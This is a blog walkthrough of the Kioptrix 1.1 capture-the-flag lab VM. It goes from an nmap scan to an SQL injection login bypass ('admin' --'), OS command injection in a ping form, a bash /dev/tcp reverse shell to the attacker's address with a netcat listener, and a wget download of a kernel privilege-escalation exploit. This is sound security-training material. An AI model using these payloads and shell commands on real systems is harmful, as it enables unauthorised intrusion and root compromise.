Kioptrix 1.1 Walkthrough Boot-To-Root

About Kioptrix VM Image Challenges:

This Kioptrix VM Image are easy challenges. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games are to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways then one to successfully complete the challenges.

Lab Setup

We will be using Kali Linux as our offensive OS and we will be running both Kali and the Kioptrix VM on VMware.

You can download the Kioptrix 1.1 VM from the following link: https://www.vulnhub.com/entry/kioptrix-level-11-2,23/

Our Kali VM has an local IP address of: 192.168.1.106

The Kioptrix 1.1 VM has a local IP address of: 192.168.1.104

Scanning & Enumeration

Let us get started by performing an nmap scan on the target, we will be using the following arguments in our scan.

nmap -sV -sC 192.168.1.104

 

22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey:
| 1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
| 1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_ 1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn’t have a title (text/html; charset=UTF-8).
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 741/udp status
|_ 100024 1 744/tcp status
443/tcp open ssl/http Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn’t have a title (text/html; charset=UTF-8).
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=–
| Not valid before: 2009-10-08T00:10:47
|_Not valid after: 2010-10-08T00:10:47
|_ssl-date: 2019-09-05T05:58:10+00:00; -3h09m39s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC4_64_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|_ SSL2_RC4_128_WITH_MD5
631/tcp open ipp CUPS 1.1
| http-methods:
|_ Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 00:0C:29:78:54:A7 (VMware)
Device type: general purpose|media device
Running: Linux 2.6.X, Star Track embedded
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:2.6.23 cpe:/h:star_track:srt2014hd
OS details: Linux 2.6.9 – 2.6.30, Star Track SRT2014HD satellite receiver (Linux 2.6.23)
Network Distance: 1 hop

 

 

From the results, we can see that the target has various ports open, here are some of the interesting ones we should test:

  1. SSH – 22
  2. Apache – 80/443
  3. MySQL – 3306

On the SSH port we have OpenSSH 3.9p1 running, which is not vulnerable to any known exploit, so this can be used as an access vector after we have exploited the system, let us move on to the web server.

For Apache, we have both HTTP and HTTPS ports running, when we try loading up the website with port 443, we get an error informing us that the SSL certificate has expired, so we will have to access the HTTP version.

We are greeted with a simple admin panel, this is very interesting as it is a custom login screen developed in PHP and does not belong to any CMS, our first objective is to try and bypass the login screen with SQL injection.

SQL Injection

You can use the most common SQL injection queries synonymous with bypassing login in screens, after trial and error, we found that this query worked:

 

admin' --

After we succesfully bypassed the login in screen, we were greeted by an administrative web console, that allows us to ping computers on our local network. We can specify the IP and we get the results presented to us.

Command Injection

From running a few tests with various local IP addresses, it becomes clear that we are able to perform OS command injection, we can check if the commands are being filtered by breaking the initial statement and by using another command, in our case we used:

192.168.1.104; pwd

We specified the IP address, and specified another OS command like pwd, which will print the current working directory if the commands are not being filtered. After running the command, it becomes obvious that the commands aren’t being filtered and we can run any system commands.

As you can see from the image above, after running the ping command and displaying the corresponding results, we can see the results from the pwd command, and it tells us that the current working directory is the default Apache directory, which in turn tells us that we are currently running commands as the Apache system user.

Spawning A Reverse Shell

The next step is to get access to the server by using a reverse shell, and since we can run system commands we do not need to use PHP, instead we can use the bash reverse shell and specify our IP and preferred port (This is also because the target OS does not have netcat installed) . We will  be using the following command to spawn our reverse shell.

bash -i >& /dev/tcp/192.168.1.106/1234 0>&1

Before we execute the command, we need to setup a listener with Netcat, this can be done by using the following command:

nc -nvlp 1234

After, the reverse shell has been setup and is listening on port 1234,. we can now execute the command.

 

 

After executing the command,we should receive a shell through the netcat listener we setup, and indeed we do. We are greeted by a bash shell with no job control.

We now have access on the target and we can begin performing some system enumeration, so as to assist with privilege escalation.

Privilege Escalation

We have determined that we are running CentOS version 4.5 running Linux kernel 2.6.9, our next objective is to search for any potential privilege escalation exploits that we can utilize. We will use searchsploit.

After searching with searchsploit we find an interesting exploit that meets our system criteria, the next step is to copy the exploit to our working directory and to upload it to the target for compilation and execution.

To copy the exploit over, we will setup SimpleHTTPServer and we will use wget to copy the exploit over to the target VM. We will use the following commands:

python -m SimpleHTTPServer

We can now use wget to download the exploit on to our target OS. We will download the file to the /tmp directory as we do not have sufficient permissions as the Apache user.

wget http://192.168.1.106:8000/9542.c

After we successfully download the file on to the target OS, we can follow the compilation instructions and execute the exploit.

 

After compiling and executing the exploit, we finally get a shell with root access!

 

Liked it? Take a second to support Alexis on Patreon!
Share this post

Leave a Reply

Your email address will not be published. Required fields are marked *

Releated

FristiLeaks1.3 – CTF Walkthrough – Boot-To-Root

FristiLeaks 1.3 Walkthrough FrisitLeaks 1.3 is a easy/intermediate box that is designed to be targeted as a CTF as opposed to a traditional penetration test. The challenges are mainly focused on enumeration, reverse engineering and privilege escalation. FristiLeaks1.3 link: https://www.vulnhub.com/entry/fristileaks-13,133/ Scanning We will get started by performing port scanning on the target VM, our objective […]

Share this post